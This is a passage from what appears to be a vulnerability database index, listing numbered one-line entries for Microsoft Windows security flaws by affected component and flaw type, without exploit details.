privilege escalation [137532] Microsoft Windows DNS Server Data Processing Error [137527] Microsoft Windows up to Server 2019 GDI+ memory corruption [137512] Microsoft Windows up to Server 2019 DHCP memory corruption [136349] Microsoft Windows up to Server 2019 Event Viewer eventvwr.msc information disclosure [136348] Microsoft Windows up to Server 2019 Task Scheduler privilege escalation [136347] Microsoft Windows up to Server 2019 AppXSVC privilege escalation [136345] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [136344] Microsoft Windows up to Server 2019 GDI information disclosure [136343] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136342] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136341] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136340] Microsoft Windows up to Server 2019 GDI information disclosure [136337] Microsoft Windows up to Server 2019 Comctl32.dll memory corruption [136336] Microsoft Windows up to Server 2019 Kernel privilege escalation [136335] Microsoft Windows up to Server 2019 NTLM 7PK Security Features [136334] Microsoft Windows up to Server 2019 Kernel information disclosure [136326] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136325] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136324] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136323] Microsoft Windows up to Server 2019 memory corruption [136321] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Audio Service privilege escalation [136320] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136319] Microsoft Windows up to Server 2019 Security Credentials 7PK Security Features [136318] Microsoft Windows up to Server 2019 DirectX privilege escalation [136317] Microsoft Windows up to Server 2019 Win32k privilege escalation [136316] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136315] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136314] Microsoft Windows up to Server 2019 Win32k privilege escalation [136313] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136312] Microsoft Windows up to Server 2019 GDI information disclosure [136311] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136310] Microsoft Windows up to Server 2019 GDI information disclosure [136309] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136308] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136306] Microsoft Windows up to Server 2019 Storage Service privilege escalation [136305] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [136304] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [136303] Microsoft Windows up to Server 2019 Storage Service privilege escalation [136302] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136301] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136299] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service 7PK Security Features [136298] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136297] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k privilege escalation [136296] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [136295] Microsoft Windows up to Server 2019 ALPC privilege escalation [136293] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136292] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136291] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136290] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136289] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136288] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136287] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136286] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136285] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136284] Microsoft Windows up to Server 2019 Kernel privilege escalation [136277] Microsoft Windows 7 SP1/2008 R2 SP1 Speech API memory corruption [136276] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136275] Microsoft Windows 10/10 1607/10 1703/10 1709/Server 2016 Hyper-V privilege escalation [136274] Microsoft Windows up to Server 2019 ActiveX memory corruption [136273] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [134744] Microsoft Windows up to Server 2019 GDI information disclosure [134733] Microsoft Windows up to Server 2019 Unified Write Filter privilege escalation [134731] Microsoft Windows up to Server 2019 Symlink privilege escalation [134729] Microsoft Windows up to Server 2019 Storage Service privilege escalation [134725] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134724] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134723] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134722] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134721] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134720] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134719] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134718] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134717] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134716] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134715] Microsoft Windows up to Server 2019 Win32k privilege escalation [134714] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134713] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134712] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134710] Microsoft Windows up to Server 2019 GDI information disclosure [134709] Microsoft Windows up to Server 2019 Kernel privilege escalation [134706] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [134701] Microsoft Windows up to Server 2019 Windows Defender Application Control 7PK Security Features [134700] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [134699] Microsoft Windows up to Server 2019 NDIS ndis.sys privilege escalation [134698] Microsoft Windows up to Server 2019 OLE privilege escalation [134684] Microsoft Windows up to Server 2019 DHCP Server memory corruption [134678] Microsoft Windows up to Server 2019 GDI+ memory corruption [133378] Microsoft Windows 7/8/10/Vista Contact File cross site scripting [133237] Microsoft Windows Admin Center privilege escalation [133236] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133234] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133222] Microsoft Windows up to Server 2019 Remote Registry Service memory corruption [133221] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133220] Microsoft Windows up to Server 2019 GDI Memory information disclosure [133219] Microsoft Windows up to Server 2019 Win32k Memory information disclosure [133218] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133217] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133216] Microsoft Windows up to Server 2019 Kernel Memory information disclosure [133215] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [133214] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [133213] Microsoft Windows up to Server 2019 Kernel Memory information disclosure [133212] Microsoft Windows up to Server 2019 Terminal Services Memory information disclosure [133211] Microsoft Windows up to Server 2019 Task Scheduler information disclosure [133210] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 DirectX information disclosure [133209] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133196] Microsoft Windows up to Server 2019 Win32k information disclosure [133195] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133194] Microsoft Windows up to Server 2019 GDI Memory information disclosure [133193] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133192] Microsoft Windows up to Server 2019 OLE Automation memory corruption [133189] Microsoft Windows up to Server 2019 CSRSS privilege escalation [133188] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133187] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133186] Microsoft Windows up to Server 2019 TCP/IP Stack information disclosure [133185] Microsoft Windows up to Server 2019 Win32k privilege escalation [133183] Microsoft Windows up to Server 2019 Win32k privilege escalation [133182] Microsoft Windows up to Server 2019 Win32k privilege escalation [133180] Microsoft Windows up to Server 2019 MS XML XML External Entity [133179] Microsoft Windows up to Server 2019 MS XML XML External Entity [133177] Microsoft Windows up to Server 2019 Device Guard luafv.sys 7PK Security Features [133174] Microsoft Windows up to Server 2019 GDI+ memory corruption [133173] Microsoft Windows up to Server 2019 IOleCvt Interface privilege escalation [133166] Microsoft Windows up to Server 2019 MS XML XML External Entity [133165] Microsoft Windows up to Server 2019 MS XML XML External Entity [133164] Microsoft Windows up to Server 2019 MS XML XML External Entity [133163] Microsoft Windows up to Server 2019 MS XML XML External Entity [133162] Microsoft Windows up to Server 2019 MS XML XML External Entity [131685] Microsoft Windows up to Server 2019 SMB information disclosure [131683] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k privilege escalation [131681] Microsoft Windows up to Server 2019 Win32k privilege escalation [131679] Microsoft Windows up to Server 2019 Kernel information disclosure [131674] Microsoft Windows up to Server 2019 Win32k information disclosure [131673] Microsoft Windows up to Server 2019 Kernel information disclosure [131672] Microsoft Windows up to Server 2019 GDI information disclosure [131671] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [131668] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [131667] Microsoft Windows up to Server 2019 Comctl32.dll memory corruption [131663] Microsoft Windows up to Server 2019 Print Spooler information disclosure [131658] Microsoft Windows up to Server 2019 information disclosure [131657] Microsoft Windows up to Server 2019 memory corruption [131653] Microsoft Windows up to Server 2019 SMB information disclosure [131652] Microsoft Windows up to Server 2019 SMB information disclosure [131651] Microsoft Windows up to Server 2019 Kernel information disclosure [131650] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Hyper-V privilege escalation [131649] Microsoft Windows up to Server 2019 Kernel privilege escalation [131648] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [131644] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [131642] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Active Directory privilege escalation [131638] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [131632] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131631] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131630] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131629] Microsoft Windows up to Server 2019 Deployment Services TFTP Server privilege escalation [131628] Microsoft Windows up to Server 2019 ActiveX memory corruption [131619] Microsoft Windows up to Server 2019 MS XML XML External Entity [131616] Microsoft Windows REG File Message weak authentication [131328] Microsoft Windows up to Server 2016 Kernel information disclosure [130820] Microsoft Windows up to Server 2012 R2 GDI information disclosure [130819] Microsoft Windows Kernel information disclosure [130818] Microsoft Windows up to Server 2019 GDI information disclosure [130817] Microsoft Windows up to Server 2019 Storage Service privilege escalation [130814] Microsoft Windows up to Server 2019 privilege escalation [130809] Microsoft Windows up to Server 2019 Defender Firewall Security 7PK Security Features [130808] Microsoft Windows up to Server 2019 information disclosure [130807] Microsoft Windows up to Server 2019 Hyper-V information disclosure [130806] Microsoft Windows up to Server 2019 SMB Data Processing Error [130805] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130804] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130803] Microsoft Windows up to Server 2019 SMB Data Processing Error [130802] Microsoft Windows up to Server 2019 Win32k information disclosure [130801] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130800] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130799] Microsoft Windows up to Server 2016 Win32k privilege escalation [130798] Microsoft Windows up to Server 2019 GDI information disclosure [130797] Microsoft Windows up to Server 2019 GDI information disclosure [130796] Microsoft Windows up to Server 2019 GDI information disclosure [130793] Microsoft Windows up to Server 2019 GDI information disclosure [130792] Microsoft Windows up to Server 2019 HID information disclosure [130791] Microsoft Windows up to Server 2019 HID information disclosure [130790] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130789] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130788] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130787] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130786] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130784] Microsoft Windows up to Server 2019 GDI+ memory corruption [130782] Microsoft Windows up to Server 2019 DHCP Server memory corruption [130781] Microsoft Windows up to Server 2019 GDI+ memory corruption [129167] Microsoft Windows VCF File memory corruption [128761] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128760] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128759] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128758] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128757] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128756] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128755] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128754] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128753] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128752] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128751] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128750] Microsoft Windows up to Server 2019 Runtime privilege escalation [128749] Microsoft Windows up to Server 2019 Kernel information disclosure [128739] Microsoft Windows up to Server 2019 Kernel information disclosure [128738] Microsoft Windows up to Server 2019 Subsystem for Linux information disclosure [128737] Microsoft Windows up to Server 2019 COM Desktop Broker privilege escalation [128736] Microsoft Windows up to Server 2019 Kernel information disclosure [128733] Microsoft Windows up to Server 2019 Authentication Request privilege escalation [128730] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128728] Microsoft Windows up to Server 2019 Kernel information disclosure [128727] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128726] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128725] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128722] Microsoft Windows 10 1803/Server 1803 DHCP Client memory corruption [128718] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [128717] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Hyper-V privilege escalation [127881] Microsoft Windows 10 1809/Server 2019 memory corruption [127880] Microsoft Windows up to Server 2019 Win32k privilege escalation [127828] Microsoft Windows up to Server 2019 Win32k privilege escalation [127827] Microsoft Windows 10 1809/Server 2019 DirectX information disclosure [127826] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Win32k information disclosure [127823] Microsoft Windows up to Server 2012 R2 Kernel information disclosure [127822] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2012 Kernel information disclosure [127821] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [127820] Microsoft Windows up to Server 2019 Kernel privilege escalation [127816] Microsoft Windows up to Server 2019 GDI information disclosure [127815] Microsoft Windows up to Server 2019 GDI information disclosure [127812] Microsoft Windows up to Server 2019 Remote Procedure Call information disclosure [127803] Microsoft Windows up to Server 2019 Text-To-Speech memory corruption [127801] Microsoft Windows up to Server 2019 DNS Server memory corruption [126750] Microsoft Windows up to Server 2019 ALPC privilege escalation [126739] Microsoft Windows up to Server 2012 R2 Win32k information disclosure [126737] Microsoft Windows up to Server 2012 R2 DirectX information disclosure [126736] Microsoft Windows up to Server 2019 Win32k privilege escalation [126735] Microsoft Windows up to Server 2019 DirectX privilege escalation [126733] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DirectX privilege escalation [126730] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [126725] Microsoft Windows up to Server 2019 DirectX privilege escalation [126722] Microsoft Windows up to Server 2019 PowerShell privilege escalation [126718] Microsoft Windows up to Server 2016 Search privilege escalation [126714] Microsoft Windows up to Server 2019 PowerShell privilege escalation [126713] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [126712] Microsoft Windows up to Server 2016 Graphics Component memory corruption [126711] Microsoft Windows up to Server 2019 Deployment Services TFTP Server memory corruption [125123] Microsoft Windows up to Server 2019 Codecs Library information disclosure [125121] Microsoft Windows up to Server 2019 DirectX information disclosure [125120] Microsoft Windows up to Server 2019 Windows Media Player information disclosure [125119] Microsoft Windows up to Server 2019 Windows Media Player information disclosure [125115] Microsoft Windows up to Server 2019 Theme API privilege escalation [125114] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [125113] Microsoft Windows up to Server 2019 Kernel privilege escalation [125112] Microsoft Windows 10 1803/Server 1803 Subsystem for Linux privilege escalation [125111] Microsoft Windows up to Server 2019 Device Guard Code Integrity Policy 7PK Security Features [125110] Microsoft Windows up to Server 2019 DNS Global Blocklist 7PK Security Features [125109] Microsoft Windows up to Server 2019 NTFS privilege escalation [125108] Microsoft Windows up to Server 2019 Filter Manager privilege escalation [125103] Microsoft Windows Server 2008 SP2 Graphics Component information disclosure [125101] Microsoft Windows Graphics Component memory corruption [125098] Microsoft Windows up to Server 2019 JET Database Engine privilege escalation [125097] Microsoft Windows up to Server 2019 DirectX Graphics privilege escalation [125096] Microsoft Windows up to Server 2019 Win32k privilege escalation [125093] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [125092] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [125091] Microsoft Windows up to Server 2019 MS XML XML External Entity [124217] Microsoft Windows Server 2012/Server 2016 Active Directory Federation Services /adfs/ls privilege escalation [123881] Microsoft Windows up to Server 2016 Sandbox privilege escalation [123874] Microsoft Windows up to Server 2016 Kernel information disclosure [123872] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 SMB information disclosure [123868] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [123867] Microsoft Windows 10 1803/Server 1803 Hyper-V privilege escalation [123866] Microsoft Windows 10 1803/Server 1803 Hyper-V privilege escalation [123864] Microsoft Windows up to Server 2016 Hyper-V information disclosure [123853] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel Memory information disclosure [123851] Microsoft Windows up to Server 2016 ALPC privilege escalation [123849] Microsoft Windows up to Server 2016 SMB privilege escalation [123843] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [123842] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [123830] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [123828] Microsoft Windows up to Server 2016 Win32k Graphics privilege escalation [123827] Microsoft Windows up to Server 2016 Image privilege escalation [123825] Microsoft Windows up to Server 2016 MSXML Parser XML External Entity [123823] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [122888] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 Windows Shell privilege escalation [122886] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122885] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122884] Microsoft Windows up to Server 2016 Win32k privilege escalation [122883] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122861] Microsoft Windows up to Server 2016 Microsoft COM for Windows privilege escalation [122858] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 LNK privilege escalation [122849] Microsoft Windows up to Server 2016 Diagnostic Hub privilege escalation [122848] Microsoft Windows Security Feature 2FA 7PK Security Features [122834] Microsoft Windows up to Server 2016 LNK privilege escalation [122833] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI+ memory corruption [122826] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 PDF memory corruption [122825] Microsoft Windows up to Server 2016 Graphics privilege escalation [121116] Microsoft Windows up to Server 2016 Sandbox privilege escalation [121111] Microsoft Windows up to Server 2016 Kernel privilege escalation [121110] Microsoft Windows up to Server 2016 Wordpad 7PK Security Features [121107] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll Data Processing Error [121092] Microsoft Windows up to Server 2016 FTP Server Data Processing Error [119474] Microsoft Windows up to Server 2016 GDI information disclosure [119471] Microsoft Windows 10 1803/Server 1803 Win32k privilege escalation [119470] Microsoft Windows up to Server 2016 HTTP HTTP.sys Data Processing Error [119469] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel privilege escalation [119468] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119467] Microsoft Windows up to Server 2016 Hypervisor privilege escalation [119466] Microsoft Windows 10 1709/Server 1709 Hyper-V privilege escalation [119465] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119464] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119463] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119461] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119460] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119459] Microsoft Windows up to Server 2016 privilege escalation [119457] Microsoft Windows up to Server 2016 Desktop Bridge privilege escalation [119456] Microsoft Windows up to Server 2016 Kernel information disclosure [119455] Microsoft Windows up to Server 2016 memory corruption [119454] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119453] Microsoft Windows 10 1709/10 1803/Server 1709/Server 1803 WebDAV privilege escalation [119452] Microsoft Windows up to Server 2016 HIDParser privilege escalation [119450] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 Kernel information disclosure [119448] Microsoft Windows up to Server 2016 Code Integrity Module privilege escalation [119447] Microsoft Windows up to Server 2016 NTFS privilege escalation [119441] Microsoft Windows up to Server 2016 Media Foundation memory corruption [119437] Microsoft Windows up to Server 2016 HTTP Protocol Stack Http.sys Data Processing Error [119436] Microsoft Windows up to Server 2016 privilege escalation [119431] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll privilege escalation [117558] Microsoft Windows up to Server 2016 memory corruption [117480] Microsoft Windows up to Server 2016 COM Serialized privilege escalation [117444] Microsoft Windows up to Server 2016 Hyper-V vSMB privilege escalation [117443] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [117442] Microsoft Windows up to Server 2016 VBScript Engine memory corruption [117331] Microsoft Windows Host Compute Host Compute Service Shim privilege escalation [116048] Microsoft Windows up to Server 2016 DirectX Graphics Kernel Subsystem privilege escalation [116047] Microsoft Windows up to Server 2016 OpenType Font Driver atmfd.dll privilege escalation [116045] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [116039] Microsoft Windows up to Server 2016 Remote Desktop Protocol Data Processing Error [116031] Microsoft Windows up to Server 2016 Kernel information disclosure [116030] Microsoft Windows up to Server 2016 SNMP Service Data Processing Error [116026] Microsoft Windows up to Server 2016 Kernel information disclosure [116024] Microsoft Windows up to Server 2016 HTTP.sys privilege escalation [116020] Microsoft Windows 10 1607/10 1703/10 1709/Server 1709/Server 2016 Active Directory 7PK Security Features [116019] Microsoft Windows up to Server 2016 Kernel information disclosure [116008] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116007] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116006] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116005] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116004] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116003] Microsoft Windows up to Server 2016 VBScript Engine memory corruption [115994] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [115804] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [114565] Microsoft Windows 10 1607/10 1703/10 1709/Server 1709/Server 2016 Kernel information disclosure [114550] Microsoft Windows Kernel information disclosure [114548] Microsoft Windows up to Server 2016 CNG Security Feature cng.sys 7PK Security Features [114547] Microsoft Windows up to Server 2016 Kernel information disclosure [114546] Microsoft Windows up to Server 2016 Kernel information disclosure [114545] Microsoft Windows up to Server 2016 Kernel information disclosure [114544] Microsoft Windows up to Server 2016 Kernel information disclosure [114543] Microsoft Windows up to Server 2016 Kernel information disclosure [114542] Microsoft Windows up to Server 2016 Kernel information disclosure [114541] Microsoft Windows up to Server 2016 Kernel information disclosure [114540] Microsoft Windows up to Server 2016 Kernel information disclosure [114536] Microsoft Windows up to Server 2016 CredSSP weak authentication [114535] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [114534] Microsoft Windows 10/10 1511/10 1607/10 1703/10 1709 Scripting Host 7PK Security Features [114531] Microsoft Windows up to Server 2016 Windows Installer privilege escalation [114530] Microsoft Windows up to Server 2016 GDI privilege escalation [114529] Microsoft Windows up to Server 2016 GDI privilege escalation [114528] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI privilege escalation [114527] Microsoft Windows up to Server 2016 Kernel information disclosure [114526] Microsoft Windows up to Server 2016 Kernel information disclosure [114525] Microsoft Windows up to Server 2016 Kernel information disclosure [114522] Microsoft Windows 10 1607/10 1703/Server 2016 Desktop Bridge privilege escalation [114521] Microsoft Windows up to Server 2016 Video Control privilege escalation [114520] Microsoft Windows 10/Server 1709/Server 2016 Desktop Bridge privilege escalation [114518] Microsoft Windows up to Server 2016 Remote Assistance XML External Entity [114517] Microsoft Windows 10/Server 1709/Server 2016 Desktop Bridge VFS privilege escalation [114516] Microsoft Windows up to Server 2016 Windows Shell privilege escalation [113264] Microsoft Windows 8.1/RT 8.1/Server 2012 R2 SMBv2/SMBv3 denial of service [113262] Microsoft Windows 10/Server 1709 Storage Services privilege escalation [113261] Microsoft Windows 10/Server 1709 Security Feature 7PK Security Features [113260] Microsoft Windows up to Server 2016 Kernel privilege escalation [113259] Microsoft Windows 10/Server 1709/Server 2016 NTFS privilege escalation [113258] Microsoft Windows 10/Server 1709 Kernel information disclosure [113257] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113256] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113255] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113254] Microsoft Windows up to Server 2016 Kernel information disclosure [113253] Microsoft Windows 10/Server 1709/Server 2016 Kernel privilege escalation [113252] Microsoft Windows up to Server 2016 Kernel privilege escalation [113251] Microsoft Windows 10/Server 1709 Kernel privilege escalation [113250] Microsoft Windows 10/Server 1709/Server 2016 Kernel privilege escalation [113249] Microsoft Windows up to Server 2016 Kernel privilege escalation [113248] Microsoft Windows up to Server 2016 Kernel information disclosure [113247] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113246] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113245] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2012 EOT Font Engine information disclosure [113244] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113243] Microsoft Windows 10/Server 2016 MultiPoint Management privilege escalation [113242] Microsoft Windows up to Server 2016 Common Log File System Driver privilege escalation [113241] Microsoft Windows up to Server 2016 Common Log File System Driver privilege escalation [113240] Microsoft Windows 10/Server 1709/Server 2016 AppContainer privilege escalation [113238] Microsoft Windows 10 1709/Server 1709 Named Pipe File System privilege escalation [113230] Microsoft Windows up to Server 2016 Scripting Engine information disclosure [113229] Microsoft Windows up to Server 2016 StructuredQuery memory corruption [111358] Microsoft Windows up to Server 2016 IPsec memory corruption [111347] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Color Management Icm32.dll information disclosure [110547] Microsoft Windows up to Server 2016 its:/ Protocol information disclosure [110531] Microsoft Windows 10/Server 2016 Device Guard 7PK Security Features [110522] Microsoft Windows up to Server 2016 RRAS privilege escalation [110350] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [110318] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [109360] Microsoft Windows up to Server 2016 Windows Search Data Processing Error [107920] Microsoft Windows up to Vista SP2 Graphics information disclosure [107759] Microsoft Windows up to Server 2016 SMB privilege escalation [107757] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [107756] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [107753] Microsoft Windows 10/Server 2016 SMB Data Processing Error [107744] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll privilege escalation [107740] Microsoft Windows up to Server 2016 Graphics privilege escalation [107739] Microsoft Windows up to Server 2016 Graphics privilege escalation [107738] Microsoft Windows up to Server 2016 Search information disclosure [107734] Microsoft Windows 10/Server 2016 SMB privilege escalation [107731] Microsoft Windows 7 SP1 Shell memory corruption [107730] Microsoft Windows up to Server 2016 Search Remote privilege escalation [107724] Microsoft Windows up to Server 2016 Text Services Framework privilege escalation [107723] Microsoft Windows up to Server 2016 SMB information disclosure [106523] Microsoft Windows up to Server 2016 PDF Library memory corruption [106516] Microsoft Windows up to Server 2016 PDF Library memory corruption [106498] Microsoft Windows up to Server 2016 Shell privilege escalation [106497] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Uniscribe memory corruption [106496] Microsoft Windows up to Server 2016 Uniscribe information disclosure [106495] Microsoft Windows up to Server 2012 R2 Uniscribe memory corruption [106492] Microsoft Windows Server 2012/Server 2012 R2/Server 2016 DHCP Service memory corruption [106489] Microsoft Windows up to Server 2016 Graphics Win32k win32k!fsc_CalcGrayRow information disclosure [106472] Microsoft Windows up to Server 2016 Bluetooth Driver Object BlueBorne privilege escalation [106454] Microsoft Windows up to Server 2016 Windows NetBT Session Services race condition [105051] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Font Library Data Processing Error [105049] Microsoft Windows 10 1703 Remote Desktop Protocol Data Processing Error [105017] Microsoft Windows up to Server 2016 Error Reporting privilege escalation [105013] Microsoft Windows 10 1607/10 1703/Server 2016 Hyper-V privilege escalation [105011] Microsoft Windows up to Server 2016 Windows Search memory corruption [105010] Microsoft Windows up to Server 2016 Win32k privilege escalation [105009] Microsoft Windows up to Server 2016 Input Method Editor Data Processing Error [104990] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [104989] Microsoft Windows up to Server 2016 